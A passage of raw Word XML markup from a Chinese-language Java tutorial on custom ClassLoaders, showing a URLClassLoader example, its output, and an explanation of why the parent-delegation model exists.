      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>静态初始化块执行了！</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        } </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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 </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分别切换加载方式，会有不同的输出结果。</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lastRenderedPageBreak/>
        <w:t> </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六、自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</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 </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为了说明问题，先看例子：</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package test; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.net.MalformedURLException; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.net.URL; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import java.net.URLClassLoader; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>/** </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>* </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>* @author leizhimin 2009-7-29 22:05:48 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>*/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public class MyClassLoader { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, IllegalAccessException, InstantiationException { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                URL url = new URL("file:/E:\\projects\\testScanner\\out\\production\\testScanner"); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                ClassLoader myloader = new URLClassLoader(new URL[]{url}); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                Class c = myloader.loadClass("test.Test3"); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                System.out.println("----------"); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                Test3 t3 = (Test3) c.newInstance(); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        } </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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 </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public class Test3 { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        static { </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                System.out.println("Test3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的静态初始化块执行了！</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"); </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        } </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</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 </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运行后：</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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Test3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的静态初始化块执行了！</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Process finished with exit code 0</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 </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可以看出自定义了</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader myloader = new URLClassLoader(new URL[]{url});</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>已经成功将类</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Test3</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>加载到内存了，并通过默认构造方法构造了对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Test3 t3 = (Test3) c.newInstance();</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 </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有关</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>还有很重要一点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067787"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同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>加载的类文件，只有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例。但是，如果同一个类文件被不同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>载入，则会有两份不同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4436">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例（前提是着两个类加载器不能用相同的父类加载器）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002150F2" w:rsidRDefault="002150F2" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002150F2" w:rsidRDefault="002150F2" w:rsidP="00067787">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E5A90" w:rsidRDefault="00B46DE5" w:rsidP="00B46DE5">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00F27C8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>加载机制</w:t>
      </w:r>
      <w:r w:rsidR="00DB1192" w:rsidRPr="00E37953">
        <w:t>为什么要使用双亲委托这种模型呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46DE5" w:rsidRPr="005A7675" w:rsidRDefault="00650057" w:rsidP="005A7675">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="279" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>因为这样可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00825584">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>避免重复加载</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，当父亲已经加载了该类的时候，就没有必要子</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>再加载一次。考虑到</w:t>
      </w:r>
      <w:r w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>安全因素，我们试想一下，如果不使用这种委托模式，那我们就可以随时使用自定义的</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来动态替代</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>核心</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中定义的类型，这样</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="00526AA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>会存在非常大的安全隐患</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，而双亲委托的方式，就可以避免这种情况，因为</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="002D1A62" w:rsidRPr="005A7675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
